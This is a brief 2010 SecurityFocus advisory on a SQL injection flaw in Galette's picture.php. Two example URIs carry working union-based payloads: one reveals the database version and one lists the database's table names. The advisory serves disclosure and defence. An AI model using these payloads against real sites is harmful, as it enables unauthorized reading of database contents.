Galette 'picture.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available.

http://www.example.com/picture.php?id_adh=0+and+1=0+union+select+@@version,null

http://www.example.com/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables


 

Copyright 2010, SecurityFocus